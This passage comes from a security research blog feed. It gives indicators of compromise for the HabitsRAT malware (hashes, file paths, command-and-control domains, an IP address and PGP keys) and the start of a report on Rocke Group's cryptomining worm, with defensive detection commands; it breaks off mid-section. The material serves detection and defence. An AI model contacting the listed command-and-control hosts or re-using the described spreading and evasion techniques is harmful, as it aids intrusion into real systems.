&lt;a href="#hashes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Windows version of HabitsRAT&lt;span class="hx:absolute hx:-mt-20" id="windows-version-of-habitsrat"&gt;&lt;/span&gt;
&lt;a href="#windows-version-of-habitsrat" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;29ebf9771e52cde90776eeccd89aaf4c19577ef136258daef1a17c767ce88c9d
37a16e79e5be132d7e6c2e1ee482d80d93ad942af7110a4bc3a05f0b575236b0
5f7d898ade3162bfb0c8d3006c42e934ff81fab3b4ad3b51c13441fd63e438cb
9e840be4b4ab358bc3405e2c688f3ab1a9d286bd4fb9edb4468dc688962b4893
f556c9b4e5bb463be84dead45a9aedcf8bec41c1c2b503ea52719357943750e7&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Linux version of HabitsRAT&lt;span class="hx:absolute hx:-mt-20" id="linux-version-of-habitsrat"&gt;&lt;/span&gt;
&lt;a href="#linux-version-of-habitsrat" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;338e41f1a8be56339b039835b06d815a3666c8b0d5725b63be7bf54c8745704a&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;File paths&lt;span class="hx:absolute hx:-mt-20" id="file-paths"&gt;&lt;/span&gt;
&lt;a href="#file-paths" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;%SystemDrive%\Windows\Defender\MsMpEng.exe
$HOME/.config/polkitd/polkitd
/etc/systemd/system/polkitd.service
%TEMP%\krebsonsecurity.xml
$HOME/.config/.accounts-daemon/accounts-daemon.login.conf
/usr/share/accounts-daemon/accounts-daemon.so
%SystemDrive%\Windows\Defender\MsMpEng.dll
%APPDATA%\Windows NT\Defender\MsMpEng.dll
%SystemDrive%\Windows\Defender\Defender.dll
%APPDATA%\Windows NT\Defender\Defender.dll&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;Network indicators&lt;span class="hx:absolute hx:-mt-20" id="network-indicators"&gt;&lt;/span&gt;
&lt;a href="#network-indicators" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;brian[.]krebsonsecurity[.]top
brian-krebs-erectile-dysfunction[.]com
krebsonfellatio[.]net
185.193.126.198&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h3&gt;C2 public keys&lt;span class="hx:absolute hx:-mt-20" id="c2-public-keys"&gt;&lt;/span&gt;
&lt;a href="#c2-public-keys" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;h4&gt;Version 11&lt;span class="hx:absolute hx:-mt-20" id="version-11"&gt;&lt;/span&gt;
&lt;a href="#version-11" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBF/I9bUBDACtHQlddPduY2DXMrQHxsh&amp;#43;jCP2ojeMi&amp;#43;08VmuC/eCG3&amp;#43;x0815p
ymssBejVcCckahu0EIJZIl5WaRY&amp;#43;nOJKF9VOdLoegpVmqPmX3GE0FJBR/cGGLSqQ
bofuDbWBIwQPVwHT&amp;#43;QriDpAK9M80H5f6FPm2HqcXJV2fI7FJ5pLWSTMRGhnTjt5D
aSiZqbXhYuq1W3S4zWSsh0TZPn0a4J44N/MwrlrPtr&amp;#43;Q&amp;#43;p31diEHPhQVQZ7a6QKD
ysM3SAx5hSUueli6nawRt6UkOhTbeL1SaGA1dv3PHliTLvOt&amp;#43;OZ6oEAU8aKp3Y2S
PQ3jKkR7x6jzkRNbu3DoXz70Te97f5ZS0qS6WFWSnpTXWC8JN0NG0cG3tDZ9ClyH
NhNnMKl040y33BzBzhQmQmHaX7NwwqEB54HIYsfE4fiSrKovxOkBBXcmS8sPhuhH
Hk6ZiXqEzlB&amp;#43;pIMvtXvNWT3qqhOC/ggmCUpt1YNHnOYoI93A&amp;#43;dlpbRSbmFOkSwL0
Zvd3RhzddtTIUf8AEQEAAbQnTWF0dCBIYXluaWUgPHBhemVyZnJvbXNpbHZlckBn
bWFpbC5jb20&amp;#43;iQHUBBMBCAA&amp;#43;FiEEmgXO4h7loKvki421YmZthezMP4EFAl/I9bUC
GwMFCQPCtQsFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQYmZthezMP4Ex/gv9
FHhkSKm9u5REhdCF&amp;#43;Ez8jk4LzoLGOaNdA8hcMCVHBWCMeE3yTGHec1P16WAqJhG&amp;#43;
LmlfpS7r0QIANeZC2W0rFI2b/lMBFzpzynR2Fi/Gpph4chNlzqlQJWgSvlBPsw0M
nnNwpzRfQhbcSdS/j&amp;#43;zFPE01bSkpm93TczcIvXvdFqJQfpU03pHrAFAvA1pmBkEW
NOmZ8JgLn&amp;#43;HReJQCeCteUbiBdGVIDPneyENZzRcO3fuXzlg3yysPIFKRBbGAqiCt
gtf&amp;#43;RsoyQ19k5vTSjXHK1KYWVvE9dA4levuN8iYKLhPxpBDNGSkY0n5NqECQpkJW
oG0dTDzMDtbAAdjhsoFIv4vH3aGr3iuoYv1ax5WxBSRb2h4Zno0Np4emo91p8FS4
KQXuNivYO5SXcEiXNRfDbUSN3J51b6v&amp;#43;SZGmdDhQUEWrEQ7MGl8eBT7DH3&amp;#43;ioZtO
qtezE/MnDzRIZW&amp;#43;o7yeryF9/aqLCa5oEFKNKgHM6n9Jmh4KAip1oiJArCJUHUQkI
uQGNBF/I9bUBDADrDvqlvnPjMQNXCWdlKjBgmiVAcWxRe5NmdIe4d43GdLXEOsWI
eTNY1/L5g4ZLXTeTgMo9ugU9bhwviWq6gro2hPXZVmBhHEVEAtICNjFTlHBOUhab
U&amp;#43;riCEeNzE3jneqfS/x04eNirM7hAplSOMOtag49TPwjzqnqGr1r/oe8L1BXHcUP
Cl6EQzk4NSGrNVO8E7Ppm7yeDnK9C0&amp;#43;4LXaMu19np/r43lg1FBk6O4d/q4/S7p&amp;#43;q
P/TILTDC0hPSQw&amp;#43;aAjQPKlfWAjZUQ0CcJT1A5x5SIVWqlpL85ltphdJzCmCiTtmm
kMIvX86OxZkzhligkJ1r1QM8OL&amp;#43;t9Mzq9mglc6PHUXIISiaVvwI3ZWH1OxI6ate3
znV8n3wfAbURDoTmPCMSNziSrvT39zsUCxY7zQoKoeNUBmx8AWW0Sgms2z1oK8ti
&amp;#43;JekSBbxLNVElglwDgtSLkgA4dOnfTUtCDstZouxVnenhLD7jUSmhbS&amp;#43;XIkjsOUY
&amp;#43;mXshXvqEb1rD5cAEQEAAYkBvAQYAQgAJhYhBJoFzuIe5aCr5IuNtWJmbYXszD&amp;#43;B
BQJfyPW1AhsMBQkDwrULAAoJEGJmbYXszD&amp;#43;BbzUMAIviQCxye0jQVnHwT1JjnyjF
7JaiJlU2nOQave16DmyHcu0rejJLhJoQXaA28Qgkv&amp;#43;6mOK4fXWyPV&amp;#43;iAcr3AKuTV
EVY6EDwwUwGn/RxcIYVt8qSZanj&amp;#43;cd6g9iJR3UMb9//25ggIW618NvW0zODowwNu
GDF5ei4cyhvA3NjCCqIvwxO&amp;#43;XRJynp&amp;#43;0lQl0ulOCS&amp;#43;Y&amp;#43;/V3H0&amp;#43;0EhIrJ8x5TvnE9
yC8CtagR0S53mNtmbS3A8INV/Gj6M7/7BZ2eVkbZRVEoQkhmr/lvJ/n4QhYcgre9
1iboJ75TorVEOH1B0Q/3IACBD/fEnSogjij8Vf/bdb4W/8LHpeV8bbtDzkzMfh7i
SxoF8y1kBl/YXrbs4mFcwgQ8KKqKkYkMp9p527LF/gglE54xMMXdp2WG65oh5jZz
0vzASRgwAI&amp;#43;K0LuN1&amp;#43;McUJwWtWQlcnQEEDlvbHVe1jKOrdqqf&amp;#43;BRxl2rNDU0P&amp;#43;u&amp;#43;
mtrn7vMinEja8k6O2N2RsL0TvLyGD&amp;#43;sAPKUZG7Q/Bg==
=gbms
-----END PGP PUBLIC KEY BLOCK-----&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Version 12&lt;span class="hx:absolute hx:-mt-20" id="version-12"&gt;&lt;/span&gt;
&lt;a href="#version-12" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGNBGBm0jYBDAC83QCJbnqPtHUfazjzNEeNmHY2zUeV8tXaKUkFyeIG9QmSSZ4u
0Y&amp;#43;uNR3p5CkexQC0C6STIkDE43fYU92N&amp;#43;Olt7jFcYK718vPv6ieGSuuztJqnrOKX
9jY/22iRPYFNjcw&amp;#43;LPQzm4CXyD3gugfp3Jm1JO99y5D5PDbP6yVpG6Fm6TmzOXku
grLoWBLWBn5Z6BJAB1YYM35vJpjC22eY6uFF6fhAW7K8mZNUKYHGwZOfkK5F&amp;#43;27Y
lxiaOHjh0mjfisWWvcvlImd5dd7614Pu5Yl3PfH4p7fUZJsGofj&amp;#43;hyiZHd9luIM1
yc9TWSQBSeBKIFM9iU7a4i0vB4rbY355tYBckuCVyt4NNBnDO0/zgVOZkf/qjTm&amp;#43;
JUZlxQJ54Gs7aWueo/aWSaqCN/TIqD909coDbw&amp;#43;sUA1CojLsw&amp;#43;ghPJBBzB/sSjzA
OCvGOVn&amp;#43;TCr8hV8OBpONXRQFUO4do6VALE/tqBlMMy12Lq/DunM87Mrb9zpJGZyh
JkqGP05xdT9omIEAEQEAAbQnQnJpYW4gS3JlYnMgPGtyZWJzb25zZWN1cml0eUBn
bWFpbC5jb20&amp;#43;iQHUBBMBCgA&amp;#43;FiEEOQFTY4snpri84X9c/wQVl3dsa2QFAmBm0jYC
GwMFCQPCZwAFCwkIBwIGFQoJCAsCBBYCAwECHgECF4AACgkQ/wQVl3dsa2QgEQv&amp;#43;
Px8Vl1WxzlWWoZsAkmLsXZzPuudAAFWai97g89/D3&amp;#43;D8kxKAiqq2mam9YKx/Cimn
B4HwGhE7ildWfVcJUx63t30Vm8rMIg1M63PQJ&amp;#43;CSIIU8cNEsWSOr8RIcfCTcenDZ
ZdK761c1xNXypag/oToTdDTOCRlfeLFkw2fgcHVsxJoIH00MtAT1utqo7xl15kGk
0jodlv6mDp17E4JBcg2aT4HpzVUIgeDOzCi5b8QPj0X1iDes8DolYu1wHnNaVAXg
SNshR5v5VbrFXvKfyx7sRA8lxQn4HkmnOH18drG&amp;#43;gsE0msFoveqf2M5BCzItY2bI
wG&amp;#43;GQwUTAwciIh5AehbpKOqrk2m588PI11i0x8bc5z3/I3YZbWhdpyJAmNErE/Et
X5nSqVn2lDoooDA9AwE6fRr2oNNxDLE0yREt88cD2EE3/iweQbpeGBSneIFKGdW3
b8zQdJi30gAe7kVS3FFnYXqNaHNhKm/WvODzwRNLSAN6Z1KwJZ79Q3uh19vkl6vr
uQGNBGBm0jYBDACxBNtcNethMzVIig0BIQbrCJ4wVS01waB3WWe71s9RUbJn/LFd
pey/f0NQrMdoUJP75Do91cS6SFI956F7l5AMWAWTDrNkiCQTG8ptegdAJQ81qWAd
V0L2YH&amp;#43;8CNYmfmTOqh3L&amp;#43;cOya6yanNMMM1&amp;#43;c1zjQjCLWzOZog7tBm&amp;#43;1891Gwy8nT
m1jf&amp;#43;oETqUcVV&amp;#43;ePrGaaNLWOB&amp;#43;U69/q6XOScaV/HeQrYLE6MTsoiFgKNEirrDDzj
rd3bjFZzttD8Cuknt7rsOtZC393JHMSu4f2SPy2Wct1r77z2PxBIkKjTJS3Ax2Lf
3rZ3Yt08v1Bmjyxq&amp;#43;zXoIUuSwSNnAP7AJyBKaOtZ/BRjT4xYL9uf0LaIC/a840SB
B3f9N3YzfYgL6GeRib6vv6OrWRPjs/ld8kaj1/l6m2Ry&amp;#43;VIs/433AWMp6b0nQqnS
EMy/72RuSxQogRbgNnwjk6mIBpEyeTQ7mXHslxK5fJVAOPdOGIVAQziQ82BdA9Yw
92ha17TJ1nKz/x8AEQEAAYkBvAQYAQoAJhYhBDkBU2OLJ6a4vOF/XP8EFZd3bGtk
BQJgZtI2AhsMBQkDwmcAAAoJEP8EFZd3bGtkCZAL/ioNDjl54jiVARfIdqSZPS77
tkkB&amp;#43;dGSuJgeZ&amp;#43;60/1gDpGXaWEyx73Mfbp&amp;#43;DT80k2JQ86Cls9S5xuy95gECMo/JI
Jxc5gPdXEH&amp;#43;II&amp;#43;wmfVbQerf1cPmjlSliaRDczJKdO5R14i7IEnD56c&amp;#43;MYDqBvTvH
NAyjFqPrVXBUcqiuDva8PvUN&amp;#43;dcLGBYwGemlNHCt0L7kQ6TPjldjqSjyeUragJYO
Ak4lz&amp;#43;E4cl&amp;#43;V5xKWjFw81S2&amp;#43;sHVLUNmR4KaY5iyfSBSDgNDFW5xQrnClJBg0&amp;#43;4cv
QqDJRd4JJOYjBp/dLjmGeXmxuVyshGePUBYrOCsm1GTf3Razr&amp;#43;lgpn4OzW78MRVv
JFfcpGhafyTvZQrV7qa7Na8fjSLr&amp;#43;drbDDxm3WP2Tz9Un0tuDvayLhTU/AnWY2MT
v&amp;#43;LlwbUDmdrZx&amp;#43;VwMCj4ZwtYkVSqHUd1yfZ5s6I&amp;#43;yPcN6700Kw0dea628GEC&amp;#43;g9V
QE&amp;#43;GLOcciRHTBgzaL16trl40wZQ8iMpgnn/FEz&amp;#43;grw==
=6v1j
-----END PGP PUBLIC KEY BLOCK-----&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;</description></item><item><title>Rocke Group Actively Targeting the Cloud: Wants Your SSH Keys</title><link>https://research.intezer.com/blog/2021/04/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/</link><pubDate>Tue, 06 Apr 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/04/rocke-group-actively-targeting-the-cloud-wants-your-ssh-keys/</guid><description>
&lt;h2&gt;New Malware Variant Exploits Production Environment&lt;span class="hx:absolute hx:-mt-20" id="new-malware-variant-exploits-production-environment"&gt;&lt;/span&gt;
&lt;a href="#new-malware-variant-exploits-production-environment" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Rocke Group is a Chinese-based threat actor most known for running
cryptojacking malware on Linux machines. The group has been
&lt;a href="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html"target="_blank" rel="noopener"&gt;active since 2018&lt;/a&gt;
and continues to evolve by modifying its tools and techniques to stay evasive.
In 2019, we reported that Rocke Group was
&lt;a href="https://intezer.com/blog/cloud-security/technical-analysis-cryptocurrency-mining-war-on-the-cloud/"target="_blank" rel="noopener"&gt;competing&lt;/a&gt;
with Pacha Group for cryptomining positioning on Linux-based servers in the
cloud. We have found a
&lt;a href="https://analyze.intezer.com/files/fe27d4a8a5f299b0b25d10816e98cef2852af6dc3541bf25a77960b1573ca61d"target="_blank" rel="noopener"&gt;new malware variant&lt;/a&gt;
developed by Rocke Group, that infects other machines in the network using
saved SSH keys and weak passwords. It also exploits vulnerabilities in popular
platforms and services such as Jenkins, Redis and ActiveMQ. Once the victim is
infected a
&lt;a href="https://analyze.intezer.com/files/398e3608455dbea2cba8e9944d9b43cbb0982b48b2882fe54adf937a7a62d9e2/sub/d10bf427-6cc9-41cb-bfae-7e12268f6f9e"target="_blank" rel="noopener"&gt;Monero cryptominer&lt;/a&gt;
is executed. Below we present our findings with instructions on how to check if
your system has been compromised, as well as how to protect your cloud
environments against future Rocke Group attacks.&lt;/p&gt;
&lt;h2&gt;Capabilities and Findings on Rocke Group Malware&lt;span class="hx:absolute hx:-mt-20" id="capabilities-and-findings-on-rocke-group-malware"&gt;&lt;/span&gt;
&lt;a href="#capabilities-and-findings-on-rocke-group-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The malware that is initially delivered to the victim&amp;rsquo;s server is packed with a
modified UPX which can make it harder for some Endpoint Detection and Response
(EDR) products to detect the malicious code. This threat contains a number of
modules that are stored in a compressed form inside the malware, and during the
execution the payloads are extracted and executed. Rocke Group uses a new
script that downloads malware from a hosting server and executes it. The
malware then uses public SSH keys, which are saved in a file called
&lt;code&gt;known_hosts&lt;/code&gt; on the victim&amp;rsquo;s Linux machine, to infect other machines on the
network. The malware archives persistence using a scheduled task in &lt;code&gt;crontab&lt;/code&gt;
and &lt;code&gt;bashrc&lt;/code&gt; files. It creates a service that controls the execution of the
malware and configures it to be executed on startup. The payload of the service
is extracted from within the Rocke Group sample. Next, the malware attempts to
spread in the network by brute forcing SSH, Redis and Jenkins with weak
passwords. Then, it exploits vulnerabilities. For Jenkins it uses two
vulnerabilities for executing code (CVE-2018-1000861, CVE-2019-1003000) and for
ActiveMQ it tries to do an arbitrary file writing (CVE-2016-3088). To hide the
activity of the malware, it implements an evasion technique that uses library
hijacking. This way the information retrieved by system commands is altered in
a way that hides resources used by the malware and its components. For
instance, running the &lt;code&gt;top&lt;/code&gt; command will not show the high CPU usage caused by
the cryptomining malware. One of the compressed modules is an XMRig Miner.
Before the miner is executed the dropper kills any other process that uses more
than 30% of the cloud server&amp;rsquo;s CPU, this way the cryptominer will have all of
the CPU for itself.&lt;/p&gt;
&lt;h2&gt;Detection and Response&lt;span class="hx:absolute hx:-mt-20" id="detection-and-response"&gt;&lt;/span&gt;
&lt;a href="#detection-and-response" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Detect if a machine in your system has been compromised by following all of
these steps:&lt;/p&gt;
&lt;p&gt;The malware creates files in the following directories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;/usr/local/sbin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/local/bin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/bin&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/usr/libexec&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/tmp&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Check if there are suspicious files in these locations. This campaign is known
for using similar names to valid Linux services and file names such as
&lt;code&gt;kerberods&lt;/code&gt;, so pay attention to the files you see in these directories. In
other cases, it uses file names like: &lt;code&gt;6ff4ba5d0de4498&lt;/code&gt;. In addition, the
malware changes the timestamps of files created during the attack so that they
appear older. You should not rely on the creation/modification time of the
files.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;: Remove the malicious files.&lt;/p&gt;
&lt;p&gt;MITRE Technique:
&lt;a href="https://attack.mitre.org/techniques/T1036/"target="_blank" rel="noopener"&gt;Masquerading (T1036)&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Check if there is a service that listens on port 61131 for incoming
connections. Use the command: &lt;code&gt;netstat -tupln&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;: Find the PID of the process and kill it. Run the following
command to get the PID:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;netstat -ltnp &lt;span class="p"&gt;|&lt;/span&gt; grep -w &lt;span class="s1"&gt;&amp;#39;:61131&amp;#39;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;and then run the following to kill the process:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-sh" data-lang="sh"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo &lt;span class="nb"&gt;kill&lt;/span&gt; -9 &amp;lt;PID&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Check if you have a service called &lt;code&gt;sshservice.service&lt;/code&gt;. You can do this by
running: &lt;code&gt;systemctl status sshservice.service&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Response&lt;/strong&gt;: Stop and remove the service by running these commands:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
